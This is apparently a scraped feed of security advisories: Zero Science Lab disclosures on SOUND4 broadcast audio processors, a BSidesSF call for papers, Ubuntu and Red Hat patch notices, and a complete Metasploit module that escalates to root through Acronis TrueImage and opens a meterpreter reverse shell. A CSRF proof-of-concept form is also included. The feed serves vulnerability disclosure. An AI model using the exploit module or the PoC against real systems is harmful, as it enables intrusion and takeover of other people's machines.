SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an authorization bypass due to an insecure direct object reference vulnerability.

  
SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Authorization Bypass (IDOR)

Vendor: SOUND4 Ltd.  
Product web page: https://www.sound4.com | https://www.sound4.biz  
Affected version: FM/HD Radio Processing:  
                  Impact/Pulse/First (Version 2: 1.1/2.15)  
                  Impact/Pulse/First (Version 1: 2.1/1.69)  
                  Impact/Pulse Eco 1.16  
                  Voice Processing:  
                  BigVoice4 1.2  
                  BigVoice2 1.30  
                  Web-Audio Streaming:  
                  Stream 1.1/2.4.29  
                  Watermarking:  
                  WM2 (Kantar Media) 1.11

Summary: The SOUND4 IMPACT introduces an innovative process - mono and  
stereo parts of the signal are processed separately to obtain perfect  
consistency in terms of both sound and level. Therefore, in moving  
reception, when the FM receiver switches from stereo to mono and back to  
stereo, the sound variations and changes in level are reduced by over 90%.  
In the SOUND4 IMPACT processing chain, the stereo expander can be used  
substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4  
PULSE gives clients the ultimate price - performance ratio, providing  
much more than just a processor. Flexible and powerful, it ensures perfect  
sound quality and full compatibility with radio broadcasting standards  
and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need  
in an FM/HD processor and sets the bar high both in terms of performance  
and affordability. Designed to deliver a sound of uncompromising quality,  
this tool gives you 2-band processing, a digital stereo generator and an  
IMPACT Clipper.

Desc: The application is vulnerable to insecure direct object references  
that occur when the application provides direct access to objects based  
on user-supplied input. As a result of this vulnerability attackers can  
bypass authorization and access the hidden resources on the system and  
execute privileged functionalities.

Tested on: Apache/2.4.25 (Unix)  
           OpenSSL/1.0.2k  
           PHP/7.1.1  
           GNU/Linux 5.10.43 (armv7l)  
           GNU/Linux 4.9.228 (armv7l)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2022-5723  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php

26.09.2022

--

(GET|POST) /** HTTP/1.1

/var/www/:  
----------

.SOUND4  
about.php  
actioninprogress.php  
broken_error.php  
cfg_filewatch.xml  
cfg_filewatch_specific.xml  
checklogin.php  
checkserver.php  
config.php  
datahandlerdlg.php  
descrxml.php  
dns.php  
downloads  
downloads.php  
fullrebootsystem.php  
global.php  
globaljs.php  
guifactorysettings.xml  
guixml.php  
guixml_error.php  
header.php  
images  
index.php  
isreboot.php  
jquery-3.2.1.min.js  
jquery-plugins  
jquery-ui-custom  
jquery-ui-i18n.js  
jquery-ui.css  
jquery-ui.js  
jquery.js  
jquery.ui.touch-punch.min.js  
killffmpeg.php  
linkandshare.php  
login.php  
logout.php  
monitor.php  
networkdiagnostic.php  
partialrebootsystem.php  
ping.php  
playercfg.xml  
rebootsystem.php  
restoreinprogress.php  
script.min.js  
secure.php  
serverinprogress.php  
settings.php  
setup.php  
setup_ethernet.php  
style.min.css  
traceroute.php  
upgrade  
upgrade.php  
upgradeinprogress.php  
uploaded_guicustomload.php  
uploaded_kantarlic.php  
uploaded_licfile.php  
uploaded_logo.php  
uploaded_presetfile.php  
uploaded_restorefile.php  
uploaded_upgfile.php  
validate_tz.php  
ws.min.js  
ws.php  
wsjquery-class.min.js  
www-data-handler.php

/usr/cgi-bin/:  
--------------

(GET|POST) /** HTTP/1.1

backup.cgi  
cgi-form-data  
downloadkantarlic.cgi  
ffmpeg.cgi  
frontpanel  
getlogs.cgi  
getlogszip.cgi  
guicustomsettings.cgi  
guicustomsettingsload.cgi  
guifactorysettings.cgi  
importpreset.cgi  
loghandler.php  
logo  
logoremove.cgi  
logoupload.cgi  
phptail.php  
printenv  
printenv.vbs  
printenv.wsf  
restore.cgi  
restorefactory.cgi  
test-cgi  
upgrade.cgi  
upload.cgi

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Authorization Bypass

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a cross site request forgery vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Cross-Site Request ForgeryVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application interface allows users to perform certain actionsvia HTTP requests without performing any validity checks to verify therequests. This can be exploited to perform certain actions with administrativeprivileges if a logged-in user visits a malicious web site.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5722Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php26.09.2022--PoC:----<form action="http://RADIO/cgi-bin/logoremove.cgi" method="POST">  <input type="submit" value="Disappear" /></form>

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Cross Site Request Forgery

SOUND4 Server Service version 4.1.102 suffers from an unquoted search path issue impacting the service SOUND4 Server for Windows. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

  
SOUND4 Server Service 4.1.102 Local Privilege Escalation

Vendor: SOUND4 Ltd.  
Product web page: https://www.sound4.com | https://www.sound4.biz  
Affected version: 4.1.102

Summary: SOUND4 Windows Server Service.

Desc: The application suffers from an unquoted search path issue impacting  
the service 'SOUND4 Server' for Windows. This could potentially allow an  
authorized but non-privileged local user to execute arbitrary code with  
elevated privileges on the system. A successful attempt would require the  
local user to be able to insert their code in the system root path undetected  
by the OS or other security applications where it could potentially be executed  
during application startup or reboot. If successful, the local user's code  
would execute with the elevated privileges of the application.

Tested on: Windows 10 Home 64 bit (build 9200)  
           SOUND4 Server v4.1.102  
           SOUND4 Remote Control v4.3.17

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2022-5721  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php

26.09.2022

--

C:\>sc qc "SOUND4 Server"  
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SOUND4 Server  
        TYPE               : 10  WIN32_OWN_PROCESS  
        START_TYPE         : 2   AUTO_START  
        ERROR_CONTROL      : 1   NORMAL  
        BINARY_PATH_NAME   : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service  
        LOAD_ORDER_GROUP   :  
        TAG                : 0  
        DISPLAY_NAME       : SOUND4 Server  
        DEPENDENCIES       :  
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe"  
C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F  
                                                 BUILTIN\Administrators:(ID)F  
                                                 BUILTIN\Users:(ID)R  
                                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R  
                                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V  
4.1.102

SOUND4 Server Service 4.1.102 Local Privilege Escalation

BSidesSF is soliciting presentations, workshops, and villages for the 2023 annual BSidesSF conference. It will be located at City View at the Metreon in downtown San Francisco April 22nd through the 23rd, 2023.

    BSidesSF is soliciting presentations, workshops, and villages for the 2023annual BSidesSF conference.Presentations: https://bsidessf.org/cfpWorkshops: https://bsidessf.org/cfp/workshopsVillages: https://bsidessf.org/cfp/villages** Topics **All topic areas related to reliability, application security, web security,network security, privacy, cryptography, and information security are ofinterest and in scope.Let us help you get the word out on The Next Big Thing!** Theme **Space: Putting the Cyber in Space!, to commemorate the new James Webb SpaceTelescope while paying homage to "cyberspace".** Submission **Presentations: https://bsidessf.org/cfpWorkshops: https://bsidessf.org/cfp/workshopsVillages: https://bsidessf.org/cfp/villages** Dates and Deadlines **January 8, 2023 – Final due date for all submissions, rolling notificationsbeginJanuary 22, 2023 – All notifications, including waitlist, sentFebruary 7, 2023 – Participation confirmed by presenters and detailsfinalizedApril 22-23, 2023 - BSidesSF 2023** Location **BSidesSF will be located at City View at the Metreon in downtown SanFrancisco.******Thanks!Security BSides San Franciscohttps://bsidessf.orgprogram@bsidessf.orghttps://twitter.com/BSidesSF

BSides SF 2023 Call For Papers

Acronis TrueImage versions 2019 update 1 through 2021 update 1 are vulnerable to privilege escalation. The com.acronis.trueimagehelper helper tool does not perform any validation on connecting clients, which gives arbitrary clients the ability to execute functions provided by the helper tool with root privileges.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::File  include Msf::Post::Common  include Msf::Post::Process  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Acronis TrueImage XPC Privilege Escalation',        'Description' => %q{          Acronis TrueImage versions 2019 update 1 through 2021 update 1          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`          helper tool does not perform any validation on connecting clients,          which gives arbitrary clients the ability to execute functions provided          by the helper tool with `root` privileges.        },        'License' => MSF_LICENSE,        'Author' => [          'Csaba Fitzl', # @theevilbit - Vulnerability Discovery          'Shelby Pace' # Metasploit Module and Objective-c code        ],        'Platform' => [ 'osx' ],        'Arch' => [ ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'CVE', '2020-25736' ],          [ 'URL', 'https://kb.acronis.com/content/68061' ],          [ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',          'WfsDelay' => 15        },        'DisclosureDate' => '2020-11-11',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options([      OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),      OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),      OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])    ])  end  def tmp_dir    datastore['WRITABLE_DIR'].to_s  end  def sys_shell    datastore['SHELL'].to_s  end  def compile    datastore['COMPILE']  end  def compile_on_target?    return false if compile == 'False'    if compile == 'Auto'      ret = cmd_exec('xcode-select -p')      return false if ret.include?('error: unable')    end    true  end  def exp_file_name    @exp_file_name ||= Rex::Text.rand_text_alpha(5..10)  end  def check    helper_location = '/Library/PrivilegedHelperTools'    helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]    plist = '/Applications/Acronis True Image.app/Contents/Info.plist'    unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }      return CheckCode::Safe    end    return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)    plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"    build_no = cmd_exec(plutil_cmd)    return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?    build_no = build_no.to_i    vprint_status("Found build #{build_no}")    return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610    CheckCode::Safe('Acronis version found is not vulnerable')  end  def exploit    payload_name = Rex::Text.rand_text_alpha(7)    @payload_path = "#{tmp_dir}/#{payload_name}"    print_status("Attempting to write payload at #{@payload_path}")    unless upload_and_chmodx(@payload_path, generate_payload_exe)      fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')    end    vprint_good("Successfully wrote payload at #{@payload_path}")    @pid = get_valid_pid    exp_bin_path = "#{tmp_dir}/#{exp_file_name}"    if compile_on_target?      exp_src = "#{exp_file_name}.m"      exp_path = "#{tmp_dir}/#{exp_src}"      compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"      unless write_file(exp_path, objective_c_code)        fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')      end      register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)      ret = cmd_exec(compile_cmd)      fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?      print_status("Successfully compiled #{exp_src}...Now executing payload")    else      print_status("Using pre-compiled exploit #{exp_bin_path}")      compiled_exploit = compiled_exp      unless upload_and_chmodx(exp_bin_path, compiled_exploit)        fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')      end      register_files_for_cleanup(exp_bin_path, @payload_path)    end    cmd_exec(exp_bin_path)  end  def objective_c_code    file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')    ERB.new(file_contents).result(binding)  rescue Errno::ENOENT    fail_with(Failure::NotFound, 'ERB payload file not found')  end  def compiled_exp    compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')    compiled.gsub!('/tmp/payload', @payload_path)    compiled.gsub!('/bin/zsh', sys_shell)    compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))    compiled  end  def get_valid_pid    procs = get_processes    return '1' if procs.empty?    len = procs.length    rand_proc = procs[rand(1...len)]    return '1' if rand_proc['pid'].to_s.blank?    rand_proc['pid'].to_s  endend

Acronis TrueImage XPC Privilege Escalation

SAP@ Host Agent suffers from a privilege escalation vulnerability.

SAP@ Host Agent Privilege Escalation

Ubuntu Security Notice 5778-1 - Jan-Niklas Sohn discovered that X.Org X Server extensions contained multiple security issues. An attacker could possibly use these issues to cause the X Server to crash, execute arbitrary code, or escalate privileges.

    ==========================================================================Ubuntu Security Notice USN-5778-1December 14, 2022xorg-server, xorg-server-hwe-18.04, xwayland vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in X.Org X Server.Software Description:- xorg-server: X.Org X11 server- xwayland: X server for running X clients under Wayland- xorg-server-hwe-18.04: X.Org X11 serverDetails:Jan-Niklas Sohn discovered that X.Org X Server extensions containedmultiple security issues. An attacker could possibly use these issues tocause the X Server to crash, execute arbitrary code, or escalateprivileges.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   xserver-xorg-core               2:21.1.4-2ubuntu1.3   xwayland                        2:22.1.3-2ubuntu0.2Ubuntu 22.04 LTS:   xserver-xorg-core               2:21.1.3-2ubuntu2.5   xwayland                        2:22.1.1-1ubuntu0.4Ubuntu 20.04 LTS:   xserver-xorg-core               2:1.20.13-1ubuntu1~20.04.5   xwayland                        2:1.20.13-1ubuntu1~20.04.5Ubuntu 18.04 LTS:   xserver-xorg-core               2:1.19.6-1ubuntu4.13   xserver-xorg-core-hwe-18.04     2:1.20.8-2ubuntu2.2~18.04.9   xwayland                        2:1.19.6-1ubuntu4.13   xwayland-hwe-18.04              2:1.20.8-2ubuntu2.2~18.04.9After a standard system update you need to reboot your computer to make allthe necessary changes.References:   https://ubuntu.com/security/notices/USN-5778-1   CVE-2022-4283, CVE-2022-46340, CVE-2022-46341, CVE-2022-46342,   CVE-2022-46343, CVE-2022-46344Package Information:   https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.4-2ubuntu1.3   https://launchpad.net/ubuntu/+source/xwayland/2:22.1.3-2ubuntu0.2   https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.3-2ubuntu2.5   https://launchpad.net/ubuntu/+source/xwayland/2:22.1.1-1ubuntu0.4   https://launchpad.net/ubuntu/+source/xorg-server/2:1.20.13-1ubuntu1~20.04.5   https://launchpad.net/ubuntu/+source/xorg-server/2:1.19.6-1ubuntu4.13 https://launchpad.net/ubuntu/+source/xorg-server-hwe-18.04/2:1.20.8-2ubuntu2.2~18.04.9

Ubuntu Security Notice USN-5778-1

Red Hat Security Advisory 2022-8980-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.5.0. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:8980-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8980  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405  
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409  
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412  
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420  
                   CVE-2022-45421  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.5.0.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
thunderbird-102.5.0-2.el9_0.src.rpm

aarch64:  
thunderbird-102.5.0-2.el9_0.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el9_0.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el9_0.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el9_0.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el9_0.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el9_0.ppc64le.rpm

s390x:  
thunderbird-102.5.0-2.el9_0.s390x.rpm  
thunderbird-debuginfo-102.5.0-2.el9_0.s390x.rpm  
thunderbird-debugsource-102.5.0-2.el9_0.s390x.rpm

x86_64:  
thunderbird-102.5.0-2.el9_0.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el9_0.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j+B9zjgjWX9erEAQj3MxAAiWxuqulrAKVourDqeqGyo9o0Qzc76EDC  
3hs4YF1bMGfaMToQkBF6JhR5/pSaHb1IqCLHxsOt+NbxhofuM4/NeOEb8mpfAY6z  
oAPnEthjNa5kW468OR+1kIE4Nmwg2mcFb2DFkpt32L18ytdALJMQcZN69YGoepJk  
bDBA+xIfQ8/UyljX15p9jFgbAXhr1sB81obT4pfhakvLs3xwUKWDkdcyDMkcsm5b  
BB44+wcpuO6or+FSFWYeZVXsPSRluWLj5l7JkyWinpYu1WpByUlCutC/3A+3vKFe  
aNw3nxdX5gN/XhZBX/QPyuaD5VPu9kD5Q/w55+A0m+C3EKguRomi/KnV2DtKFD+n  
Gc1EgZZ6sf4LmL9aTUlndsT1h3yrBWqbZY6CYTdg8DC3PobnN7V1QkDvrsderxTR  
VXpXcMt8HODKtuxRW8yuX8ISKWFMw93uP2GRUKIhWsXs6SmJU2fit5cF552W0Qyn  
5S/xUng2NT0HuLXPaJBqY/pvwgzVzx04oERfUVxETwBZwbBVis7mtbA4L9k3qR6U  
WAfbLDCXT9Ka//Jg/qawOs4I7Wmrx016tLiGvr9wgV4F+z/P6mIOy/S5YBFNWC/f  
cjltodNEi7rN9OZ68zqi2/d0tgkb0DedJzChwBH363Kf01C0+oMiw7WsyBArrZIV  
FAfAe/UKfO8=Jv2X  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8980-01

Red Hat Security Advisory 2022-8989-01 - The kpatch management tool provides a kernel patching infrastructure which allows you to patch a running kernel without rebooting or restarting any processes. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2022:8989-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8989  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64

3. Description:

The kpatch management tool provides a kernel patching infrastructure which  
allows you to patch a running kernel without rebooting or restarting any  
processes.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
kpatch-patch-4_18_0-193_81_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_87_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_90_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_91_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_93_1-1-1.el8_2.src.rpm

ppc64le:  
kpatch-patch-4_18_0-193_81_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_81_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_81_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_87_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_87_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_87_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-1.el8_2.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-193_81_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_81_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_81_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_87_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_87_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_87_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
